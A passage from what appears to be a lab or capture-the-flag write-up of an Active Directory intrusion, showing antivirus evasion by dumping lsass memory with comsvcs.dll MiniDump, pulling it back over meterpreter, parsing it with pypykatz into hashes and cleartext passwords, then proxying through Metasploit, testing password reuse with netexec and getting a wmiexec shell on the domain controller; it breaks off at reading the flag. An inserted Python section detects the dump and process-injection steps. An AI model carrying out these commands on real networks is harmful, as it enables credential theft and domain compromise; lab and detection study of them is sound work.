
    名称:    DC.de1ay.com
    Address:  10.10.10.10
It is indeed 10.10.10.10.
2. Credential harvesting
Now on to credential harvesting. Again, MSF post modules cannot be used here because of 360.
The core idea for getting around it is to move the dangerous operation somewhere the AV cannot see it.
We can dump the memory of lsass and parse it offline.
How it works:
    Windows caches the credentials of logged-on accounts in the memory of lsass.exe
        ↓
    Dump the entire memory of lsass.exe to a file
        ↓
    Pull the dump file back to Kali
        ↓
    Parse it offline on Kali with Mimikatz (pypykatz below); the AV has no reach into Kali
What do we dump lsass with?
A tool built into Windows, so nothing has to be uploaded:
    C:\> tasklist | findstr lsass
Output:
    lsass.exe                      504 Services                   0     13,748 K
Dump:
    C:\> rundll32.exe comsvcs.dll,MiniDump 504 C:\lsass.dmp full
Verify the file was written:
Output:
    dir C:\lsass.dmp
     驱动器 C 中的卷没有标签。
     卷的序列号是 36C6-96D5

     C:\ 的目录

    2026/03/31  09:35        35,685,792 lsass.dmp
                   1 个文件     35,685,792 字节
                   0 个目录 23,998,697,472 可用字节
Pull lsass.dmp back to Kali:
    meterpreter > download C:\lsass.dmp /tmp/lsass.dmp
Analyze it locally on Kali:
    pypykatz lsa minidump /tmp/lsass.dmp
Output:
    INFO:pypykatz:Parsing file /tmp/lsass.dmp
    FILE: ======== /tmp/lsass.dmp =======
    == LogonSession ==
    authentication_id 165100 (284ec)
    session_id 0
    username mssql
    domainname DE1AY
    logon_server DC
    logon_time 2026-03-31T03:25:30.862066+00:00
    sid S-1-5-21-2756371121-2868759905-3853650604-2103
    luid 165100
        == MSV ==
            Username: mssql
            Domain: DE1AY
            LM: f67ce55ac831223dc187b8085fe1d9df
            NT: 161cff084477fe596a5db81874498a24
            SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d
            DPAPI: NA
        == WDIGEST [284ec]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == Kerberos ==
            Username: mssql
            Domain: DE1AY.COM
            Password: 1qaz@WSX
            password (hex)3100710061007a004000570053005800
            AES128 Key: 161cff084477fe596a5db81874498a24
            AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009
        == WDIGEST [284ec]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == TSPKG [284ec]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == DPAPI [284ec]==
            luid 165100
            key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4
            masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8
            sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da
    == LogonSession ==
    authentication_id 127932 (1f3bc)
    session_id 0
    username mssql
    domainname DE1AY
    logon_server DC
    logon_time 2026-03-31T03:25:25.979257+00:00
    sid S-1-5-21-2756371121-2868759905-3853650604-2103
    luid 127932
        == MSV ==
            Username: mssql
            Domain: DE1AY
            LM: f67ce55ac831223dc187b8085fe1d9df
            NT: 161cff084477fe596a5db81874498a24
            SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d
            DPAPI: NA
        == WDIGEST [1f3bc]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == Kerberos ==
            Username: mssql
            Domain: DE1AY.COM
            Password: 1qaz@WSX
            password (hex)3100710061007a004000570053005800
            AES128 Key: 161cff084477fe596a5db81874498a24
            AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009
        == WDIGEST [1f3bc]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == TSPKG [1f3bc]==
            username mssql
            domainname DE1AY
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == DPAPI [1f3bc]==
            luid 127932
            key_guid 2448f6fe-7205-4d0f-bf26-ad62392fee41
            masterkey 7f90a79da5e174918bcd0d1d9dd1817f14ec93452e30aa77f4baa8a44a8d6d96d9d4f5b03674ce769e9882310c4a3569782d088d725b5079e68c68656e58b01f
            sha1_masterkey babc839ce0711c54628f2b8d1bc9eece4fcea7c2
        == DPAPI [1f3bc]==
            luid 127932
            key_guid fd0e5033-a527-4336-9ce0-d8b80b5d114f
            masterkey 4a42f16a6bb4094a579796a3dff1d1c5c05ae88ff9a56983c63fd8803dbc7759da9faf2f525cf6f6450eacf6ac37edf3bb64636976b8df9e4c374b530c01af95
            sha1_masterkey d11dc11589f0e61c97e8cb5873489475a87d7915
        == DPAPI [1f3bc]==
            luid 127932
            key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4
            masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8
            sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da
    == LogonSession ==
    authentication_id 996 (3e4)
    session_id 0
    username WEB$
    domainname DE1AY
    logon_server 
    logon_time 2026-03-31T03:25:21.907650+00:00
    sid S-1-5-20
    luid 996
        == MSV ==
            Username: WEB$
            Domain: DE1AY
            LM: NA
            NT: c2ad29b45ce46e659d7eac123b4f383c
            SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819
            DPAPI: NA
        == WDIGEST [3e4]==
            username WEB$
            domainname DE1AY
            password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
        == Kerberos ==
            Username: web$
            Domain: DE1AY.COM
            Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            AES128 Key: c2ad29b45ce46e659d7eac123b4f383c
            AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b
        == WDIGEST [3e4]==
            username WEB$
            domainname DE1AY
            password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
    == LogonSession ==
    authentication_id 49346 (c0c2)
    session_id 0
    username 
    domainname 
    logon_server 
    logon_time 2026-03-31T03:25:16.868841+00:00
    sid None
    luid 49346
        == MSV ==
            Username: WEB$
            Domain: DE1AY
            LM: NA
            NT: c2ad29b45ce46e659d7eac123b4f383c
            SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819
            DPAPI: NA
    == Orphaned credentials ==
        == WDIGEST [ced3f]==
            username WEB$
            domainname DE1AY
            password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
        == WDIGEST [1c2ef]==
            username Administrator
            domainname WEB
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == WDIGEST [3e7]==
            username WEB$
            domainname DE1AY
            password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
        == Kerberos ==
            Username: Administrator
            Domain: WEB
            Password: 1qaz@WSX
            password (hex)3100710061007a004000570053005800
            AES128 Key: 161cff084477fe596a5db81874498a24
        == Kerberos ==
            Username: 
            Domain: 
        == Kerberos ==
            Username: web$
            Domain: DE1AY.COM
            Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            AES128 Key: c2ad29b45ce46e659d7eac123b4f383c
            AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b
        == Kerberos ==
            Username: WEB$
            Domain: de1ay.com
            Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            AES128 Key: c2ad29b45ce46e659d7eac123b4f383c
        == TSPKG [1c2ef]==
            username Administrator
            domainname WEB
            password 1qaz@WSX
            password (hex)3100710061007a004000570053005800
        == TSPKG [ced3f]==
            username WEB$
            domainname DE1AY
            password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
            password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
        == DPAPI [1c2ef]==
            luid 115439
            key_guid cf6375e9-cb73-403c-85c1-1f8c0fd40713
            masterkey 6d31defa2d59070dbf24673f3ee89c4600677bf9e792ed8b3dea0595631934f80bcd31b2ad93639e8b68b562b3e3b89516b6b94f5ca3dbb4da0e28782bdcbc1b
            sha1_masterkey b911d3809e6562b85db1df179dbfb7808287e08e
        == DPAPI [3e7]==
            luid 999
            key_guid ca77cbfd-8261-40b9-8d5c-0f41ebe094a6
            masterkey 357094262b63cf3190a4a82aaa429a04099645ed42284af9caf50045b82ff2692bd8b36135c284fd2225c90a282014fac614efedd1a577bea80ce3f6a26cab60
            sha1_masterkey 8f3d523b12ef2d2d75694c8ac6a9f468b2147a8b
        == DPAPI [3e7]==
            luid 999
            key_guid 874982d1-e64a-46e2-8434-37fcb44b2d95
            masterkey 1c54c8bfce93778015b7bc92de6253fc237d18242e0458dd822cb3f32aa4de95cf185021f73924705564e9fd273ec3d1025704b9b9aaca75bc2bfd68e3db2411
            sha1_masterkey 39cd11d60c21c759180576142d233a520e7e5a5b
        == DPAPI [3e7]==
            luid 999
            key_guid f13057c0-8c1b-48c4-80ee-09c0eb097cae
            masterkey 82277b34d9a3147b63dfac2f2bc47e08ad32657220af7dc707bc81d62f47178e988e8cbf4898d1659ef735a8352b78254f4cfe851df64caac4dab70f01e543b5
            sha1_masterkey c4b06d1dbea1a9c5d87ed05dfff96ae4c2d27cee
        == DPAPI [3e7]==
            luid 999
            key_guid 5ef855ab-943b-4302-bbda-8846492bd228
            masterkey 9bdfbcbdce5c4b728874d2f93ae45b2044d464c665b383ea996cfa6b74cb63b9938ea70aa8dcb9ab02fdc566e60d2200a9d5adb2dce54e06d9039fb7465c2797
            sha1_masterkey 4c6d5a4bc1991ce5aedc0888f9ac9c5158236bb4
        == DPAPI [3e7]==
            luid 999
            key_guid f07d31a0-5b8c-4a4c-8482-8808d16cafb1
            masterkey d955b8244772d8d34aa302e14084d06b86a6311ef7845541863288694f9b7aaa621279b5605daa2e5722e28fac9fa30d2c8b2f623dae4847d2e445cfa219ae6f
            sha1_masterkey 7a0ee6c0e59730442acde4d5c96f9ab9afedcc53
        == DPAPI [3e7]==
            luid 999
            key_guid 43ea2159-28dc-4507-90bd-751f19e7db5d
            masterkey cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
            sha1_masterkey 56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
From this we can see:
    The password of DE1AY\mssql is 1qaz@WSX
    The password of WEB\Administrator is 1qaz@WSX
We did not capture the DC's credentials directly, but it is reasonable to suspect that the DC uses the same password.
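Both host-side steps described above leave telemetry that endpoint logging records: the migrate from powershell.exe (PID 3676) into spoolsv.exe (PID 1144) is a cross-process thread creation, which Sysmon logs as Event ID 8 (CreateRemoteThread), and the rundll32 comsvcs.dll,MiniDump dump of lsass (PID 504) is a process creation whose command line Sysmon Event ID 1 or Windows event 4688 (with command-line logging enabled) captures. As an added example that is not part of the original write-up, the Python below runs two detection rules over a constructed, normalized event stream and correlates the dumped PID back to the lsass process record. PIDs and image paths mirror the ps listing above; the rundll32 PID 2600, the benign rundll32 event, the event schema and the function names are all this example's own assumptions.

```python
import ntpath
import re
from typing import Dict, List

# Constructed, normalized host events in the style of Sysmon Event ID 1 (process create)
# and Event ID 8 (CreateRemoteThread). PIDs and image paths follow the ps listing in the
# write-up; PID 2600 and the benign rundll32 event (PID 2612) are invented for the example.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process_create", "pid": 504, "image": r"C:\Windows\system32\lsass.exe",
     "cmdline": r"C:\Windows\system32\lsass.exe", "user": r"NT AUTHORITY\SYSTEM"},
    {"type": "process_create", "pid": 1144, "image": r"C:\Windows\System32\spoolsv.exe",
     "cmdline": r"C:\Windows\System32\spoolsv.exe", "user": r"NT AUTHORITY\SYSTEM"},
    {"type": "process_create", "pid": 3676,
     "image": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe", "user": r"WEB\Administrator"},
    # The migrate step: a thread created inside spoolsv.exe by the PowerShell host.
    {"type": "remote_thread", "source_pid": 3676,
     "source_image": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
     "target_pid": 1144, "target_image": r"C:\Windows\System32\spoolsv.exe"},
    # The built-in dump primitive from the write-up, run from the migrated SYSTEM session.
    {"type": "process_create", "pid": 2600, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"rundll32.exe comsvcs.dll,MiniDump 504 C:\lsass.dmp full",
     "user": r"NT AUTHORITY\SYSTEM"},
    # Ordinary rundll32 use that must not alert.
    {"type": "process_create", "pid": 2612, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL", "user": r"WEB\Administrator"},
]

# comsvcs.dll's MiniDump export called with "<pid> <path>"; tolerant of case and spacing.
MINIDUMP_RE = re.compile(
    r"comsvcs(?:\.dll)?\s*,\s*minidump\s+(?P<pid>\d+)\s+(?P<path>\S+)", re.IGNORECASE
)
# SYSTEM service images that a user-session shell has no business creating threads in.
SERVICE_IMAGES = {"spoolsv.exe", "svchost.exe", "lsass.exe", "services.exe", "winlogon.exe"}


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Run both rules over an event stream; returns one alert dict per hit, in stream order."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    alerts = []
    for e in events:
        if e["type"] == "process_create":
            m = MINIDUMP_RE.search(e["cmdline"])
            if m:
                target = procs.get(int(m["pid"]))
                alerts.append({
                    "rule": "comsvcs_minidump",
                    "pid": e["pid"], "user": e["user"],
                    "target_pid": int(m["pid"]),
                    "target_image": image_name(target["image"]) if target else "unknown",
                    "dump_path": m["path"],
                })
        elif e["type"] == "remote_thread":
            src, dst = image_name(e["source_image"]), image_name(e["target_image"])
            if dst in SERVICE_IMAGES and src not in SERVICE_IMAGES:
                alerts.append({
                    "rule": "remote_thread_into_service",
                    "source_pid": e["source_pid"], "source_image": src,
                    "target_pid": e["target_pid"], "target_image": dst,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The point of the PID correlation is that the command line alone says "dump process 504"; only by joining it to the process-creation record does the alert say "dump of lsass.exe", which is what an analyst needs to triage it. Both rules fire on the write-up's sequence and stay quiet on the ordinary rundll32 invocation.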
3. Routing and proxy
First set up a route and a SOCKS proxy through the existing MSF session, so that tools on the attack machine can be pointed at the DC directly:
    msf > route add 10.10.10.0/24 1
    msf > use auxiliary/server/socks_proxy
    msf > set SRVHOST 127.0.0.1
    msf > set SRVPORT 1080
    msf > set VERSION 5
    msf > run -j
Edit the proxychains configuration file:
    sudo vim /etc/proxychains4.conf
Find the [ProxyList] section at the end of the file and change its contents to match the proxy configured above:
    [ProxyList]
    socks5 127.0.0.1 1080
4. Verify password reuse
Check it over SMB:
    netexec smb 10.10.10.10 -u Administrator -p '1qaz@WSX' -d DE1AY
Output:
    SMB  10.10.10.10  445  DC  [+] DE1AY\Administrator:1qaz@WSX (Pwn3d!)
[+] DE1AY\Administrator:1qaz@WSX confirms that the password really is reused.
(Pwn3d!) means the account has administrative rights on the target.
5. Get a shell
Using wmiexec:
    proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py DE1AY/Administrator:'1qaz@WSX' @10.10.10.10 -codec gbk
-codec gbk fixes the garbled output.
Once the shell is obtained, read the flag file in the root directory:
    C:\>dir
     驱动器 C 中的卷没有标签。
     卷的序列号是 92FD-8733

     C:\ 的目录

    2019/09/08  18:57    <DIR>          101cde781c961a208b
    2025/09/02  06:53                25 flag.txt.txt
    2013/08/22  23:52    <DIR>          PerfLogs
    2013/08/22  22:50    <DIR>          Program Files
    2013/08/22  23:39    <DIR>          Program Files (x86)
    2019/09/09  10:47    <DIR>          Users
    2026/03/31  10:05    <DIR>          Windows
    2025/09/02  06:50    <DIR>          新建文件夹
                   1 个文件             25 字节
                   7 个目录 54,923,354,112 可用字节

    C:\>type flag.txt.txt